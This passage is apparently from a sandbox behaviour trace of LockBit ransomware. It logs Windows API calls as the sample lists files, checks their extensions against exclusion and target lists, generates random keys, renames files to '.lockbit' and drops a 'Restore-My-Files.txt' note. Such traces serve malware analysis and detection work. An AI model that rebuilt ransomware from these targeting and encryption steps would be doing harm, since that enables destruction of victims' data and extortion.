param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.465] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.465] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2f90, dwReserved0=0x0, dwReserved1=0x0, cFileName="CERTINTL.DLL", cAlternateFileName="")) returned 1 [0210.465] lstrcmpiW (lpString1=".", lpString2="CERTINTL.DLL") returned -1 [0210.466] lstrcmpiW (lpString1="..", lpString2="CERTINTL.DLL") returned -1 [0210.466] PathFindExtensionW (pszPath="CERTINTL.DLL") returned=".DLL" [0210.466] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.466] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.466] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.467] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.467] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.467] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.488] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49538400, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0xeec9ffd0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49538400, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x4da8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLVWINTL.DLL", cAlternateFileName="")) returned 1 [0210.488] lstrcmpiW (lpString1=".", lpString2="CLVWINTL.DLL") returned -1 [0210.488] lstrcmpiW (lpString1="..", lpString2="CLVWINTL.DLL") returned -1 [0210.488] PathFindExtensionW (pszPath="CLVWINTL.DLL") returned=".DLL" [0210.488] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.488] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.488] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.489] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0675200, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x5073bca0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa0675200, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x8990, dwReserved0=0x0, dwReserved1=0x0, cFileName="CMAXRES.DLL", cAlternateFileName="")) returned 1 [0210.489] lstrcmpiW (lpString1=".", lpString2="CMAXRES.DLL") returned -1 [0210.489] lstrcmpiW (lpString1="..", lpString2="CMAXRES.DLL") returned -1 [0210.489] PathFindExtensionW (pszPath="CMAXRES.DLL") returned=".DLL" [0210.489] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.489] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.489] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.490] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.490] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.490] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.490] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.490] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.490] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.490] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.490] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d7e200, ftCreationTime.dwHighDateTime=0x1c9c49e, ftLastAccessTime.dwLowDateTime=0x5073bca0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe4d7e200, ftLastWriteTime.dwHighDateTime=0x1c9c49e, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="COFFEE.CSS", cAlternateFileName="")) returned 1 [0210.490] lstrcmpiW (lpString1=".", lpString2="COFFEE.CSS") returned -1 [0210.490] lstrcmpiW (lpString1="..", lpString2="COFFEE.CSS") returned -1 [0210.490] PathFindExtensionW (pszPath="COFFEE.CSS") returned=".CSS" [0210.490] lstrcmpiW (lpString1=".386", lpString2=".CSS") returned -1 [0210.490] lstrcmpiW (lpString1=".cmd", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".exe", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".ani", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".adv", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".theme", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".msi", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".msp", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".com", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".diagpkg", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".nls", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".diagcab", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".lock", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".ocx", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".mpa", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".cpl", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".mod", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".hta", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".icns", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".prf", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".rtp", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".diagcfg", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".msstyles", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".bin", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".hlp", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".shs", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".drv", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".wpx", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".bat", lpString2=".CSS") returned -1 [0210.491] lstrcmpiW (lpString1=".rom", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".msc", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".spl", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".ps1", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".msu", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".ics", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".key", lpString2=".CSS") returned 1 [0210.491] lstrcmpiW (lpString1=".mp3", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".reg", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".dll", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".ini", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".idx", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".sys", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".hlp", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".ico", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".lnk", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".rdp", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".lockbit", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="COFFEE.CSS") returned 1 [0210.492] lstrcmpiW (lpString1="ntldr", lpString2="COFFEE.CSS") returned 1 [0210.492] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="COFFEE.CSS") returned 1 [0210.492] lstrcmpiW (lpString1="bootsect.bak", lpString2="COFFEE.CSS") returned -1 [0210.492] lstrcmpiW (lpString1="autorun.inf", lpString2="COFFEE.CSS") returned -1 [0210.492] lstrcmpiW (lpString1="thumbs.db", lpString2="COFFEE.CSS") returned 1 [0210.492] lstrcmpiW (lpString1="iconcache.db", lpString2="COFFEE.CSS") returned 1 [0210.492] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.492] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS") returned=".CSS" [0210.492] lstrcmpiW (lpString1=".rar", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".zip", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".7z", lpString2=".CSS") returned -1 [0210.492] lstrcmpiW (lpString1=".ckp", lpString2=".CSS") returned -1 [0210.492] lstrcmpiW (lpString1=".dacpac", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".db", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".db-shm", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".db-wal", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".db3", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".dbf", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".dbc", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".dbs", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".dbt", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".dbv", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".frm", lpString2=".CSS") returned 1 [0210.492] lstrcmpiW (lpString1=".mdf", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".mrg", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".mwb", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".myd", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".ndf", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".qry", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".sdb", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".sdf", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".sql", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".sqlite", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".sqlite3", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".sqlitedb", lpString2=".CSS") returned 1 [0210.493] lstrcmpiW (lpString1=".tmd", lpString2=".CSS") returned 1 [0210.493] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS.lockbit") returned 67 [0210.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\coffee.css"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.496] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.496] malloc (_Size=0x40068) returned 0x3df0008 [0210.496] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3450) returned 1 [0210.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.497] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.501] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.501] malloc (_Size=0x9c) returned 0x1fab0b8 [0210.501] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fab0b8, Length=0x9c, FileInformationClass=0xa) returned 0xc0000008 [0210.502] free (_Block=0x1fab0b8) [0210.502] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.502] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.502] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.502] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62bc4600, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0xeec9ffd0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62bc4600, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x35be, dwReserved0=0x0, dwReserved1=0x0, cFileName="CollectSignatures_Init.xsn", cAlternateFileName="COLLEC~1.XSN")) returned 1 [0210.502] lstrcmpiW (lpString1=".", lpString2="CollectSignatures_Init.xsn") returned -1 [0210.502] lstrcmpiW (lpString1="..", lpString2="CollectSignatures_Init.xsn") returned -1 [0210.502] PathFindExtensionW (pszPath="CollectSignatures_Init.xsn") returned=".xsn" [0210.502] lstrcmpiW (lpString1=".386", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".cmd", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".exe", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".ani", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".adv", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".theme", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".msi", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".msp", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".com", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".nls", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".diagcab", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".lock", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".ocx", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".mpa", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".cpl", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".mod", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".hta", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".icns", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".prf", lpString2=".xsn") returned -1 [0210.502] lstrcmpiW (lpString1=".rtp", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".msstyles", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".bin", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".hlp", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".shs", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".drv", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".wpx", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".bat", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".rom", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".msc", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".spl", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".ps1", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".msu", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".ics", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".key", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".mp3", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".reg", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".dll", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".ini", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".idx", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".sys", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".hlp", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".ico", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".lnk", lpString2=".xsn") returned -1 [0210.503] lstrcmpiW (lpString1=".rdp", lpString2=".xsn") Thread: id = 24 os_tid = 0xa28 [0076.576] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x219fdc8 | out: TokenHandle=0x219fdc8*=0x1d8) returned 1 [0076.576] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x12, TokenInformation=0x219fdc0, TokenInformationLength=0x4, ReturnLength=0x219fdcc | out: TokenInformation=0x219fdc0, ReturnLength=0x219fdcc) returned 1 [0076.576] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x13, TokenInformation=0x219fdc0, TokenInformationLength=0x4, ReturnLength=0x219fdcc | out: TokenInformation=0x219fdc0, ReturnLength=0x219fdcc) returned 1 [0076.576] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0xa, TokenInformation=0x219fde8, TokenInformationLength=0x38, ReturnLength=0x219fdcc | out: TokenInformation=0x219fde8, ReturnLength=0x219fdcc) returned 1 [0076.576] CloseHandle (hObject=0x1e0) returned 1 [0076.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0076.582] Process32First (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.582] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0076.582] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: 